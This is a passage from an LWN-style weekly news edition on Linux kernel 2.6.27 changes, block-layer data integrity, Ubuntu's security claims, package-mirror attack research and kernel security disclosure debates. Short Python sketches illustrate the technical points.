happens if the patent is held to be invalid.  So, even if Sun is ultimately
successful in its challenge (as seems likely), Red Hat will not be getting
its money back under the terms of this agreement.


Red Hat's initial press release claimed that this settlement demonstrated
the company's commitment to standing up for the community in the face of
patent trolls, and stated that it would discourage any future such cases.
At this point it seems fairly evident that Sun has made a better show of
standing up for the community and discouraging future cases.  What Red Hat
has done, though, is to show us how future patent problems could be
resolved in the absence of obvious prior art.  If one must pay the troll,
one would do well to come out with an agreement like this one and, at
least, keep the troll away from the rest of the community.  Whether patent
holders who actually have a legal leg to stand on will be willing to agree
to such a settlement remains to be seen; the nature of the game is such
that, unfortunately, we are likely to get an answer to that question sooner
or later.

		2.6.27: what's coming (part 1)


Linus wasted no time after the 2.6.26 release; he opened the 2.6.27 merge
window less than 24 hours later.  As of this writing, the process has
barely begun with a mere 3000 changesets merged.  So we do not have a
complete picture of what will be in the next kernel release.  But we can
look at what has been merged so far.

User-visible changes include:


 New drivers for CompuLab EM-x270 audio devices (as found on the 
     Toshiba e800 PDA), 
     Philips UDA1380 codecs,
     Wolfson Micro WM8510 and WM8990 codecs,
     Atmel AT32 audio devices,
     AK4535 codecs,
     SGI HAL2 audio devices (as found in Indy and Indigo2 workstations),
     SGI O2 audio boards,
     crypto engines found in Intel IXP4xx processors,
     Freescale Security Engine processors,
     AMD I/O memory management units,
     Marvell Loki (88RC8480), Kirkwood (88F6000), and Discovery Duo
     (MV78xx0) system-on-chip processors, 
     IBM Power Virtual Fibre Channel Adapters, and
     GEFanuc C2K cPCI single-board computers.


 The old "ppc" architecture has been removed; all platforms are now
     supported by the integrated "powerpc" architecture code.

 The SCSI command filter - which controls which SCSI commands can be 
     sent to a device by which kind of user - is now per-device and can be
     changed via sysfs.

 The block subsystem now has support for hardware which can perform
     data integrity checking; this will allow some kinds of errors to be
     caught before the associated data is lost forever.  See this article for more
     information on the block-layer integrity feature.

 The "dummy" Linux security module has been removed; the default module
     is now the capabilities module.

 The crypto code has gained support for the RIPEMD-128, RIPEMD-160,
     RIPEMD-256, and RIPEMD-320 hash algorithms.  Asynchronous hashing is
     now supported and is implemented by the "cryptd" software crypto
     daemon. 

 Xen now has support for the saving and restoring of virtual machines -
     possibly migrating them to different hosts in between.

 The new virtual file /sys/firmware/memmap shows the memory
     map as it was configured by the system BIOS before the kernel booted. 

 The ftrace lightweight tracing framework has been merged.  See
     Documentation/ftrace.txt for more
     information on ftrace. 

 The mmiotrace tool has
     been merged.  Mmiotrace will capture and print out memory-mapped I/O
     accesses, making it a useful tool for the reverse-engineering of
     binary drivers.

 The ARM and powerpc architectures now support the latencytop tool.

 The RDMA code has acquired support for the InfiniBand "base memory
     management extension" operations.  The IP-over-InfiniBand code can now
     perform large receive offload (LRO).

 Delayed allocation support has been added to the ext4 filesystem,
     which is getting quite close to its target feature set.

 The SATA layer now has enclosure management support; this allows the
     system to do things like blink an LED to indicate a specific drive in
     a large enclosure.

 The SGI IRIX binary compatibility layer has been removed.
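
As an illustration of the /sys/firmware/memmap item in the list above,
here is a small sketch of how the new files might be read from user
space.  It assumes that each map entry appears as a numbered directory
containing "start", "end", and "type" files, with the addresses written in
hexadecimal; that layout should be checked against the kernel's ABI
documentation before relying on it.  The helper names and the sample values
are invented, and the demonstration runs against a temporary directory
rather than a real sysfs tree.

```python
import os
import tempfile


def read_memmap(root="/sys/firmware/memmap"):
    """Return a list of (start, end, type) tuples, one per map entry.

    Assumed layout: <root>/<N>/start, <root>/<N>/end, <root>/<N>/type.
    """
    entries = []
    numbered = (name for name in os.listdir(root) if name.isdigit())
    for name in sorted(numbered, key=int):
        entry = os.path.join(root, name)
        with open(os.path.join(entry, "start")) as f:
            start = int(f.read().strip(), 16)
        with open(os.path.join(entry, "end")) as f:
            end = int(f.read().strip(), 16)
        with open(os.path.join(entry, "type")) as f:
            kind = f.read().strip()
        entries.append((start, end, kind))
    return entries


def build_fake_tree(entries):
    """Create a throwaway directory tree mimicking the assumed layout."""
    root = tempfile.mkdtemp()
    for index, (start, end, kind) in enumerate(entries):
        entry = os.path.join(root, str(index))
        os.mkdir(entry)
        for name, value in (("start", start), ("end", end), ("type", kind)):
            with open(os.path.join(entry, name), "w") as f:
                f.write(value + "\n")
    return root


# Made-up sample values so that the sketch runs on any system.
fake_root = build_fake_tree([
    ("0x0", "0x9fbff", "System RAM"),
    ("0x9fc00", "0x9ffff", "reserved"),
])
demo_entries = read_memmap(fake_root)
for start, end, kind in demo_entries:
    print(f"{start:#x}-{end:#x} ({kind})")
```

On a kernel with this feature, calling read_memmap() with no argument
should list the real firmware-provided map, though reading the files may
require root privileges.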


Changes visible to kernel developers include:


 The register_security() function has been removed.  Security 
     modules which wish to implement stacking must now do so explicitly.

 The request_queue_t type is gone at last; block drivers
     should use struct request_queue instead.

 Quite a bit of big kernel
     lock removal work has been merged.  For
     char devices, the open() method from struct
     file_operations is no longer protected by the BKL.  Calls to
     fasync() have also lost BKL protection.

 Many drivers have been converted to use the firmware loader, making it
     possible to strip the firmware from the kernel for those who are
     inclined to do so.  See this
     article for more information on the firmware work.

 The API work in the i2c layer continues; there is now an autodetection
     capability which allows new-style drivers to detect devices on their
     buses automatically.

 The SCSI layer has gained new support for "device handlers," which are
     mostly concerned with multipath management.  Some of this code has
     been moved over from the device mapper.


Come back next week for the next episode in the "what's coming in 2.6.27"
series.

		Block layer: integrity checking and lots of partitions


One likes to think of disk drives as being a reliable store of data.  As
long as nothing goes so wrong as to let the smoke out of the device, blocks
written to the disk really should come back with the same bits set in the
same places.  The reality of the situation is a bit less encouraging,
especially when one is dealing with the sort of hardware which is available
at the local computer store.  Stories of blocks which have been corrupted,
or which have been written to a location other than the one which was
intended, are common.

For this reason, there is steady interest in filesystems which use
checksums on data stored 
to block devices.  Rather than take the device's word that it successfully
stored and retrieved a block, the filesystem can compare checksums and be sure.  A
certain amount of checksumming is also done by paranoid applications in
user space.  The checksums used by BitKeeper are said to have caught a
number of corruption problems; successor tools like git have checksums
wired deeply into their data structures.  If a disk drive corrupts a git
repository, users will know about it sooner rather than later.


Checksums are a useful tool, but they have one minor problem: checksum
failures tend to come when they are too late to be useful.  By the time a
filesystem or application notices that a disk block isn't quite what it
once was, the original data may be long gone and unrecoverable.  But disk
block corruption often happens in the process of getting the data to the
disk; it would sure be nice if the disk itself could use a checksum to
ensure that (1) the data got to the disk intact, and (2) the disk
itself hasn't mangled it.


To that end, a few standards groups have put together schemes for the
incorporation of data integrity checking into the hardware itself.  These
mechanisms generally take the form of an additional eight-byte checksum
attached to each 512-byte block.  The host system generates the checksum
when it prepares a block for writing to the drive; that checksum will
follow the data through the series of host controllers, RAID
controllers, network fabrics, etc., with the hardware verifying the
checksum along each step of the way.  The checksum is stored with the data,
and, when the data is read in the future, the checksum travels back with
it, once again being verified at each step.  The end result should be that
data corruption problems are caught immediately, and in a way which
identifies which component of the system is at fault.
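
As a rough illustration of the eight-byte-per-block idea, here is a minimal
sketch in Python.  The article does not spell out the layout of those eight
bytes; the split used here (a two-byte CRC "guard", a two-byte application
tag, and a four-byte reference tag holding the low bits of the target block
number) and the CRC polynomial 0x8BB7 reflect your editor's understanding of
the T10 DIF format and should be read as assumptions.  The function names
are invented for the example and are not kernel interfaces.

```python
import struct

SECTOR_SIZE = 512
T10_DIF_POLY = 0x8BB7  # assumed guard-tag polynomial (T10 DIF CRC16)


def crc16_t10dif(data: bytes) -> int:
    """Bitwise CRC16, MSB first, initial value 0, no final XOR."""
    crc = 0
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ T10_DIF_POLY) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc


def generate_tuple(sector: bytes, lba: int, app_tag: int = 0) -> bytes:
    """Build the eight bytes of integrity data for one 512-byte sector."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    # Assumed layout: guard (2 bytes), application tag (2), reference tag (4).
    return struct.pack(">HHI", crc16_t10dif(sector), app_tag, lba & 0xFFFFFFFF)


def verify_tuple(sector: bytes, lba: int, integrity: bytes) -> bool:
    """Check both the data (guard) and the intended location (reference tag)."""
    guard, _app_tag, ref_tag = struct.unpack(">HHI", integrity)
    return guard == crc16_t10dif(sector) and ref_tag == (lba & 0xFFFFFFFF)
```

Every component along the path can run the equivalent of verify_tuple()
before passing the block along.  The reference tag is what would catch the
"written to the wrong place" failure described above: the data may be
intact, but the block number no longer matches.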


Needless to say, this integrity mechanism requires operating system
support.  As of the 2.6.27 kernel, Linux will have such support, at least
for SCSI and SATA drives, thanks to Martin Petersen.  The well-written documentation file included with the data
integrity patches envisions three places where checksum generation and
verification can be performed: in the block layer, in the filesystem, and
in user space.  Truly end-to-end protection seems to need user-space
verification, but, for now, the emphasis is on doing this work in the block
layer or filesystem - though, as of this writing, no integrity-aware
filesystems exist in the mainline repository.

Drivers for block devices which can manage integrity data need to register
some information with the block layer.  This is done by filling in a
blk_integrity structure and passing it to
blk_integrity_register().  See the document for the full details;
in short, this structure contains two function pointers.
generate_fn() generates a checksum for a block of data, and
verify_fn() will verify a checksum.  There are also functions for
attaching a tag to a block - a feature supported by some drives.  The data
stored in the tag can be used by filesystem-level code to, for example,
ensure that the block is really part of the file it is supposed to belong
to.


The block layer will, in the absence of an integrity-aware filesystem,
prepare and verify checksum data itself.  To that end, the bio
structure has been extended with a new bi_integrity field,
pointing to a bio_vec structure describing the checksum
information and some additional housekeeping.  Happily, the integrity
standards were written to allow the checksum information to be stored
separately from the actual data; the alternative would have been to modify
the entire Linux memory management system to accommodate that information.
The bi_integrity area is where that information goes;
scatter/gather DMA operations are used to transfer the checksum and data
to and from the drive together.


Integrity-aware filesystems, when they exist, will be able to take over the
generation and verification of checksum data from the block layer.  A call
to bio_integrity_prep() will prepare a given bio
structure for integrity verification; it's then up to the filesystem to
generate the checksum (for writes) or check it (for reads).  There's also a
set of functions for managing the tag data; again, see the document for the
details.

Extended partitions

One of the more irritating and long-lived annoyances in the Linux block layer
has been the limit on the number of partitions which can be created on any
one device.  IDE devices can handle up to 64 partitions, which is usually
enough, but SCSI devices can only manage 16 - including one reserved for
the full device.  As these devices get larger, and as applications which
benefit from filesystem isolation (virtualization, for example) become more
popular, this limit only becomes more irksome.

The interesting thing is that the work needed to circumvent this problem
was done some years ago when device numbers were extended to 32 bits.  Some
complicated schemes were
proposed back in 2004 as a way of extending the number of partitions while
not changing any existing device numbers, but that approach was never
adopted.  In the meantime, increasing use of tools like udev has
pretty much eliminated the need for device number compatibility; on most
distributions, there are no persistent device files anymore.

So when Tejun Heo revisited the
partition limit problem, he didn't bother with obscure bit-shuffling
schemes.  Instead, with his patch set, block devices simply move to a new
major device number and have all minor numbers dynamically assigned.  That
means that no block device has a stable (across boots) number; it also
means that the minor numbers for partitions on the same device are not
necessarily grouped together.  But, since nobody really ever sees the
device numbers on a contemporary distribution, none of this should matter.
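
The effect of dynamic assignment can be modeled in a few lines of Python.
This is a toy, not the kernel's allocator: the 12-bit/20-bit split is how the
kernel packs a 32-bit device number internally as far as your editor knows,
while the major number, the class, and the function names below are all
hypothetical.

```python
from itertools import count

MINORBITS = 20                       # 32-bit dev_t: 12-bit major, 20-bit minor
MINORMASK = (1 << MINORBITS) - 1
EXT_MAJOR = 300                      # hypothetical shared "extended" major


def mkdev(major: int, minor: int) -> int:
    """Pack a major/minor pair into one device number."""
    return (major << MINORBITS) | minor


def dev_major(dev: int) -> int:
    return dev >> MINORBITS


def dev_minor(dev: int) -> int:
    return dev & MINORMASK


class ExtendedMinors:
    """Hand out minors from one shared space, first come, first served."""

    def __init__(self, major: int = EXT_MAJOR):
        self.major = major
        self._next_minor = count()

    def alloc(self) -> int:
        minor = next(self._next_minor)
        if minor > MINORMASK:
            raise RuntimeError("extended minor space exhausted")
        return mkdev(self.major, minor)


def number_partitions(names):
    """Assign device numbers in discovery order; returns {name: dev}."""
    pool = ExtendedMinors()
    return {name: pool.alloc() for name in names}
```

If partitions are discovered in the order sda1, sdb1, sda2, then
number_partitions() gives sda1 and sda2 minors 0 and 2, with sdb1 sitting
between them.  A different discovery order on the next boot yields different
numbers, which is exactly why nothing should be depending on them.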

Tejun's patch series is an interesting exercise in slowly evolving an
interface toward a final goal, with a number of intermediate states.  In
the end, the API as seen by block drivers changes very little.  There is a
new flag (GENHD_FL_EXT_DEVT) which allows the disk to use extended
partition numbers; once the number of minor numbers given to
alloc_disk() is exhausted, any additional partitions will be
numbered in the extended space.  The intended use, though, would appear to
be to allocate no traditional minor numbers at all - allocating disks with
alloc_disk(0) - and creating all partitions in that extended
space.  Tejun's patch causes both the IDE and sd drivers to allocate
gendisk structures in that way, moving all disks on most systems
into the (shared) extended number space.

Even though modern distributions are comfortable with dynamic device
numbers (and names, for that matter), it seems hard to imagine that a
change like this would be entirely free of systems management problems
across the full Linux user base.  Distributors may still be a little
nervous from the grief they took after the shift to the PATA drivers
changed drive names on installed systems.  So it's not really clear when
Tejun's patches might make it into the mainline, or when distributors would
make use of that functionality.  The pressure for more partitions is
unlikely to go away, though, so these patches may find their way in before
too long.

		Ubuntu, security response, and community contributions


A recent interview with Mark
Shuttleworth is raising a few eyebrows.  The Austrian news site
derStandard sat down with Ubuntu founder and Canonical CEO Shuttleworth at
GUADEC in Istanbul, asking about many aspects of Ubuntu, desktops, and Linux in
general.  His answers to questions about synchronizing releases with other
major distributions included some controversial claims.


Last May, Shuttleworth suggested that the major enterprise distributions
(Red Hat, 
SUSE, Debian, and Ubuntu) should coordinate their release cycles
to foster better stabilization of Linux components.  None of the other
distributions have expressed much in the way of interest in that plan—at
least publicly—though Shuttleworth says there have been some
interesting 
discussions behind the scenes.  In answer to a question about the belief
that Ubuntu has much more to gain than either Red Hat or Novell, 
Shuttleworth said:

Well we have a better security track record than Red Hat, we do that by
focusing very hard on security, making sure the updates are available as
fast as possible on Ubuntu, independent studies have generally ranked
Ubuntu number one.


Below is a table that summarizes the response time for a few vulnerable
packages over the last several months.  It shows when the vulnerability was
first announced along with the first update from each of four major
distributions.  Note that some distributions fixed the vulnerability at
different times for different versions, so the date below is the first;
other distribution versions may have waited longer for an update.


There doesn't appear to be any clear "winner", though Red Hat seems to beat
Ubuntu in most cases—at least on this set of vulnerabilities.  It
would be much easier to do this kind of comparison if Ubuntu followed Red
Hat's lead and published regular
assessments of its security performance.


It is rather easy to make sweeping statements, referring to unnamed
"independent studies", while it is much harder to actually gather the
information and present it.  Red Hat's transparency on its security
performance is something that all distributions should strive
for—especially those who would tout their security response.
But the security issue is just a part of a fairly pervasive perception that
Ubuntu and Canonical are not 
contributing very much back to the community.


That is the underlying concern that Shuttleworth is addressing.  He continues:

So what I'm trying to say here, that the notion that Canonical wouldn't
contribute anything in such a situation and it would be a one way flow is
something I disagree with. Look for example at the fact that Ubuntu has
usually better hardware support, if we all were on the same kernel the
others could take the drivers we put in there and have hardware support
that is just as good as Ubuntu.


While supporting more hardware is an excellent goal, doing it by merging
unsupported drivers into the kernel is not the recommended path.  As Red
Hat kernel hacker Dave Jones puts it:

Does no-one else see the hypocrisy in this statement ? Here's how it reads
to me... "It would be great if everyone just shipped the Ubuntu kernel and
debugged the random crap we merge that we don't have the resources to do
ourselves".

If only there were some kind of process of getting drivers merged upstream
to kernel.org. Perhaps then we COULD be on the same kernel. Oh wait, there
is a process. Ubuntu just chooses to ignore it.


Canonical, unlike the other major enterprise distribution vendors, is not known for its
kernel contributions.  It is a much smaller organization than Red Hat
or Novell, so its support organization is rather small as well.  Trying to
support lots of hardware is a
difficult task.  Doing it with out-of-tree and binary-only drivers makes it
that much harder.


Historically there has also been friction
between Ubuntu and its upstream distribution, Debian, at
least partially because of a perception that it does not contribute back.
It is against this backdrop that Shuttleworth is speaking.  The fact that
he feels that he needs to defend Ubuntu speaks volumes.


Some of the complaints might be written off to jealousy over the popularity
of Ubuntu, but there is a fair amount of truth to them as well.  Canonical
and the Ubuntu community have done some fairly amazing things in a short
period of time, but they did it by leveraging lots of work by Debian and
others. It is important to be a contributing member of the larger Linux
ecosystem, so Ubuntu and Canonical need to work to remove this perception
of the distribution, regardless of its merits.  Talk alone won't do that;
action is required.


		Trust and mirrors


A recent look
at attacks on package managers has much of interest.  None of the
attack methods are particularly new at some level, but applying them to the
update process is.  When the mechanism that is used to keep one's system
updated with respect to security vulnerabilities is itself susceptible, it
is definitely worth a look.


Much of the problem stems from the fact that many community distributions
rely on volunteer mirrors to distribute updates.  These mirrors could be
malicious, which would allow them to distribute bad code to systems that are
checking for updates.  In addition, mirrors are perfectly placed to notice
which machines are updating for particular
vulnerabilities—information that could be used in attacks. 


The study looked at ten of the most popular Linux and BSD package
management systems 
and found all of them to be vulnerable to one or more of the flaws its authors
identified.  Package managers track metadata—information
about what package versions and dependencies there are—as well as
the packages themselves in formats like .rpm or .deb.
Typically, the packages are cryptographically signed (using GPG for
example) so that they can be
verified as genuine by client systems.  Some package managers also sign the
metadata, but some do not, which allows for additional attacks. 


The biggest issue with mirrors is the information that they gain.  When a
client requests a certain package, it is pretty easy to guess that it is
probably vulnerable to whatever security flaw is being fixed in that new
package.  A malicious mirror—or one that has been
subverted—could try to attack the client machine via the flaw being
fixed.  A suitable vulnerability could be used to completely
compromise the client machine.


Once a particular chunk of data, either package or metadata, has been
signed, it is valid more or less forever.  This can be used by malicious
mirrors in two ways: serving up old metadata that points clients at known
vulnerable package versions or serving up old packages that are known to
have flaws.  In both cases, it is a kind of "replay" attack, using old,
valid data for malicious purposes.


In most cases, package managers will not downgrade to previous package
versions unless explicitly instructed to, so machines that have already
upgraded are not generally vulnerable to a package replay.  However, if a
client reliably contacts a particular mirror for metadata, that mirror can
continue serving an older version until an exploit of interest comes
along.  By knowing that the client has not upgraded—because it has
been held back by the mirror-served metadata—an attacker can exploit
the newly-discovered vulnerability at their convenience.
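
One plausible client-side defense against replayed or frozen metadata is to
have the signed metadata carry a version counter and an expiration time, and
to have clients refuse anything that goes backward or has expired.  The
sketch below assumes exactly that; the field names, the exception, and the
function are hypothetical and do not describe any existing package manager.
It also assumes the signature on the metadata has already been verified.

```python
from dataclasses import dataclass


class StaleMetadata(Exception):
    """Raised when metadata looks replayed or has outlived its validity."""


@dataclass(frozen=True)
class Metadata:
    version: int     # hypothetical counter, increased by the signer each release
    expires: float   # hypothetical expiry time, in seconds since the epoch


def check_fresh(meta: Metadata, last_seen_version: int, now: float) -> int:
    """Return the version to remember, or raise StaleMetadata."""
    if meta.version < last_seen_version:
        # Older than something this client has already accepted: a replay.
        raise StaleMetadata("metadata is older than a version already seen")
    if now >= meta.expires:
        # A mirror that keeps serving the same old file is caught here.
        raise StaleMetadata("metadata has expired")
    return meta.version
```

The version check alone does not help a client which has only ever talked to
the one malicious mirror; the expiration time is what bounds how long such a
mirror can hold that client back.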


Mirrors can also perform "endless data" attacks where the data
transfer for the package or metadata is never terminated.  The mirror keeps
sending more and more data until it fills the client disk.  This is likely
to "only" cause a denial of service on the machine that is being updated,
but that can still be a serious result, especially when the update process
is automated.
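
The obvious mitigation for an endless-data attack is for the client to decide
up front how much it is willing to accept and to stop reading once that limit
is passed.  The following is a minimal sketch of that idea, not a description
of what any package manager actually does; the names are invented, and how a
client learns a sensible limit (from signed metadata, say) is left as an
assumption.

```python
class DownloadTooLarge(Exception):
    """Raised when a server sends more data than the client agreed to accept."""


def read_bounded(stream, max_bytes: int, chunk_size: int = 65536) -> bytes:
    """Read a stream to end-of-file, giving up once max_bytes is exceeded."""
    buf = bytearray()
    while True:
        # Never ask for more than one byte past the limit.
        want = min(chunk_size, max_bytes + 1 - len(buf))
        chunk = stream.read(want)
        if not chunk:
            return bytes(buf)
        buf += chunk
        if len(buf) > max_bytes:
            raise DownloadTooLarge(f"more than {max_bytes} bytes received")


class EndlessZeros:
    """Stand-in for a hostile mirror: read() never reports end-of-file."""

    def read(self, n: int) -> bytes:
        return b"\0" * n
```

Calling read_bounded(EndlessZeros(), 1024) raises DownloadTooLarge after
buffering 1025 bytes, rather than filling the disk.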


Unsigned metadata can allow for several other kinds of attacks.
Manipulating the dependencies that are provided or needed by a package can
lead to various kinds of problems.  A dependency on a non-existent package
will stop the update from happening, while a dependency on a package of the
attacker's choosing can lead to complete compromise.


There is not a lot that can be done to solve the information gathering
problem.  Subscription-based distributions generally avoid it by providing
their own servers rather than relying upon mirrors.  For community
distributions, there really is no central authority that has the resources
to do that.  Also, controlling all the mirrors only goes so far; if any are
compromised, the same kinds of attacks are possible.
Downloading the packages to a non-vulnerable host is probably the best
avoidance technique, but is difficult to do in practice.  


The lessons from this study are clear.  Metadata should be signed and
only downloaded from "trusted" servers.  If there is a concern about
man-in-the-middle attacks, an encrypted connection should be used between
the clients and servers with certificates being checked to ensure the
connection is going where expected.


In the end, it comes down to trusting the mirrors that one uses.  It is not
terribly surprising that mirrors can cause these kinds of problems, but the
study authors did an excellent job pulling together the different kinds of
attacks.  The picture that they paint is not particularly pretty, but it is
one we needed to see.


		Handling kernel security problems


Even the most casual observer of the linux-kernel mailing list must have noticed
that, in the shadow of the firmware flame war, there is also a heated
discussion over the management of security issues.  There have also been
some attempts to turn this local battle
into a multi-list, regional conflict.  Finding the right way to deal with
security problems is difficult for any project, and the kernel is no
exception.  Whether this discussion will lead to any changes remains to be
seen, but it does at least provide a clear view of where the disagreements
are. 


Things flared up this time in response to the 2.6.25.10 stable kernel update.
The announcement stated that "any users of the 2.6.25 kernel series
are STRONGLY encouraged to upgrade to this release," but did not say
why; none of the patches found in this release were marked as security
problems.  As it happens, there were security-related fixes in that update;
some users are upset that they were not explicitly called out as such.
They have reached the point of accusing the kernel developers of hiding
security problems.


These problems, it is said, are fixed with relatively
benign-sounding commit messages ("x86_64 ptrace: fix sys32_ptrace
task_struct leak," for example) and users are not told that a security fix
has been made.  This, in turn, is thought to put users at risk because (1) they
do not know when they need to apply an update, and (2) there is no
clear picture of how many security problems are surfacing in the kernel
code.  So, as "pageexec" (or "PaX Team") put
it:


	the problem i raised was that there's one declared policy in
	Documentation/SecurityBugs (full disclosure) yet actual actions are
	completely different and now Linus even admitted it. the problem
	arising from such inconsistency is that people relying on the
	declared disclosure policy will make bad decisions and potentially
	endanger their users. there're two ways out of this sitution:
	either follow full disclosure in practice or let the world at large
	know that you (well, Linus) don't want to. in either case people
	will adjust their security bug handling processes and everyone will
	be better off.


There are two aspects to the charge that the kernel is not following a full
disclosure policy: commit messages are said to obscure security fixes, and
kernel releases do not highlight the fact that security problems have been
fixed.  There is an element of truth to the first charge, in that Linus will
freely admit to changing commit logs which
discuss security problems too explicitly:


	I literally draw the line at anything that is simply greppable
	for. If it's not a very public security issue already, I don't want
	a simple "git log + grep" to help find it.

	That said, I don't _plan_ messages or obfuscate them, so "overflow"
	might well be part of the message just because it simply describes
	the fix. So I'm not claiming that the messages can never help
	somebody pinpoint interesting commits to look at, I'm just also not
	at all interested in doing so reliably.


His goal here is clear: make life just a little harder for people who are
searching the commit logs for vulnerabilities to exploit.  One may argue
over whether this policy amounts to hiding security problems, or whether it
will be effective in reducing exploits (and plenty of people have shown
their willingness to do such arguing), but the fact remains that it
is the policy followed by Linus at this time.  In his view, the
committing of a fix is the disclosure of the problem, and there is no need
to be more explicit than that.
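
To make the "git log + grep" test concrete, here is a small Python sketch of
the kind of naive keyword search Linus is talking about.  The keyword list is
an assumption made up for this example; nobody has published a canonical
one.

```python
import re

# Hypothetical list of "obvious" security keywords; purely illustrative.
OBVIOUS = re.compile(
    r"\b(security|exploit\w*|vulnerab\w*|CVE-\d{4}-\d+)\b",
    re.IGNORECASE,
)


def greppable(subjects):
    """Return the commit subjects that a simple keyword search would flag."""
    return [s for s in subjects if OBVIOUS.search(s)]
```

The commit message quoted earlier, "x86_64 ptrace: fix sys32_ptrace
task_struct leak", sails through this filter unflagged, while a subject
containing the word "security" or a CVE number would not.  Anybody actually
reading the patch is not slowed down at all, of course.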

That view extends to the whole security update process found in much of the
community.  He has no respect for embargo policies or delayed disclosure, and he
criticizes the "whole security circus"
which, in his opinion, emphasizes the wrong thing:


	It makes "heroes" out of security people, as if the people who don't just 
	fix normal bugs aren't as important.

	In fact, all the boring normal bugs are _way_ more important, just
	because there's a lot more of them. I don't think some spectacular
	security hole should be glorified or cared about as being any more
	"special" than a random spectacular crash due to bad locking.


Beyond that, it is often hard to know which patches are truly security
fixes.  It has been argued at times that all bugs have security
relevance; it's mostly just a matter of figuring out how to exploit them.
So explicitly marking security fixes risks taking attention away from all
of the other fixes, many of which may also, in fact, fix security issues.
Thus, Linus says:


	If people think that they are safer for only applying (or upgrading
	to) certain patches that are marked as being security-specific,
	they are missing all the ones that weren't marked as such. Making
	them even _believe_ that the magic security marking is meaningful
	is simply a lie.  It's not going to be.

	So why would I add some marking that I most emphatically do not
	believe in myself, and think is just mostly security theater?


That said, the stable kernel updates go out with patches which are known to
be security fixes.  Some people clearly believe that being STRONGLY
encouraged to update is not sufficient notification of that fact.  It does
seem that there has been a trend away from explicit recognition of security
issues in the stable releases.  The inclusion of CVE numbers was once
common; in the 2.6.25 series, only 2.6.25.1, 2.6.25.2, and 2.6.25.5 had such numbers in the
changelogs.  It is, indeed, true that a straightforward reading of the
stable release changelogs will not tell users whether those releases fix
relevant security issues.


There are a number of answers to that complaint too, of course.  The real
information is in the source code, and that is always public.  The fixes in
the stable series are unlikely to be all that relevant to most users
anyway; they are running distributor kernels which are many months behind
even the -stable series and which may (or may not) be affected by a specific
problem.  In the end, users who are concerned about security issues in
their kernels have somebody to turn to: their distributors.  Linux
distributors follow disclosure rules and
tend to do a pretty thorough job of fixing the known security problems and
propagating those fixes to users.  For users who need a high level of
long-term support, there are distributors who are more than willing to
provide that kind of service for a fee.


As is often the case, what it really comes down to here is resources.  It
would be nice if somebody were to follow the patch stream (well over 100
patches/day into the mainline) and identify each one which has security
implications.  For each patch, this person could then figure out which
kernel version was first affected by the vulnerability, obtain a CVE
number, and issue a nicely-formatted advisory.  But this is a huge job, one
which nobody is likely to do in an uncompensated mode for any period of time.
So somebody would have to pay for this work.  And, to a great extent, that
is just what the distributors are doing now - with the nice addition that
they backport the fixes into the kernels they support.


It is worth noting that those distributors have not been doing a whole lot
of complaining about how security fixes are handled now.  Instead, the
complaining has come, primarily, from the maintainers of the out-of-tree grsecurity project which, from a
suitably 
cynical point of view, could be seen to benefit from raising the profile of
Linux kernel security problems.


But, regardless of the validity of any such charge, there may be some value
in what they are asking.  It is good to have a clear sense of what
the security problems in a piece of code are.  If nothing else, it helps
the project itself to understand where it stands with regard to security
and whether things are getting better or worse.  So it would be nice if the
kernel developers could be a bit more diligent and organized in how they
track security issues, much like the tracking of regressions has improved
over the last couple of years.  But this kind of improvement will not
happen until somebody decides to put the work into it.  Actually putting
some time into documenting kernel security issues will accomplish far more
than complaining on mailing lists.

		Control model railroads with JMRI


JMRI is the
Java Model Railroad Interface, a cross-platform open-source project
that has been developed by a long list of contributors:


 The JMRI project is building tools for model railroad computer control. We want it to be usable to as many people as possible, so we're building it in Java to run anywhere, and we're trying to make it independent of specific hardware systems.
JMRI is intended as a jumping-off point for hobbyists who want to control their layouts from a computer without having to create an entire system from scratch.
JMRI provides the DecoderPro and PanelPro
applications, tools for model railroaders who want to configure
DCC decoders and create control panels.


DCC, the Digital Command Control system,
uses a PC-connected
interface to send power and two-way control signals over the
model railroad track to control boards on model train
engines and other peripherals such as track switches and lights.
The protocol allows for the control of multiple engines; each engine
can have addressable lights, sound effects, smoke generators, etc.
The JMRI Hardware Support document lists a wide
variety of supported DCC interface devices and other controller
options.  The JMRI Help System document and the
DecoderPro Manual are good places to read about the capabilities of
the system.


Production version 2.2 of JMRI was announced on July 15,
just in time for the 2008
National Model Railroad Convention
in Anaheim, CA:
"At long last, the 2.1.* series of JMRI test releases has resulted in something good enough for new users to start with, our definition of a "production" release. We're therefore making a new production version, JMRI 2.2, available today."
A number of JMRI clinics are being held at the NMR convention.
The release notes for version 2.2 mention support for many new
devices, improved support for existing devices, new scripts,
documentation improvements and more.


The JMRI project has been caught up in a
legal controversy:
"For the last three years JMRI has been under attack by Matt Katzer and his attorney Kevin Russell. They have been using various coercive tactics, some of which we believe are illegal, in an attempt to put a stop to JMRI's work or to extract money from JMRI.
Katzer, through his attorney Russell, obtained a patent on model railroad technology that other people had developed years before. Using a "continuation" application, they applied for a patent that covered JMRI after JMRI had openly published its code. Because Katzer and Russell didn't provide the prior art to the Patent Office, the patent was promptly issued." (Also see this LWN article from April 2006).
Donations
are being accepted for the JMRI legal defense fund.


Despite having no compatible hardware, your author decided to
download JMRI 2.2
onto an Ubuntu Hardy Heron system with the default OpenJDK Runtime
Environment version 1.6.0-b09.  The JMRIdemo application was run
and everything started up as expected.  The demo allows the user to
step through the user interface and see the various configuration
and control screens.


To get an idea of the amount of complexity that a JMRI system
can handle, see the
SP Shasta Route
model railroad layout that is featured at
this year's NMR convention.


		Gentoo: New release, "new" leadership


Last week, lots of Gentoo news came out, so it's a good time to look at what
  happened and what it means. Gentoo's 2008.0 release was its first
  in more than a year, despite its attempts to release twice a
  year. Fortunately, Gentoo releases don't mean much because it's already a
  live distribution rather than a snapshot in time with occasional updates. A
  release provides a new kernel with the accompanying driver support,
  occasionally a flashy new bootsplash, and the usual bugfixes to the GUI
  installer, which is not universally loved. But what happened to make this
  release come so long after the last one? First, 2007.1 was canceled,
  largely because so many security vulnerabilities came out that it was
  impossible to keep up with release rebuilds. 2008.0 was scheduled to come
  out in March, so it slipped 4 months.

 Tobias Klausmann described the
  problems well. Here are a couple of them:


  Building release media in itself isn't easy to begin with - catalyst is a
  powerful but complex (and complicated) tool. ... On top of this, the central
  release coordinator has to keep in mind all of the gritty details of the
  arches that will see release media. There's arches like ppc which also have
  a differently-bitted cousin (ppc64); there are arches that are very, very
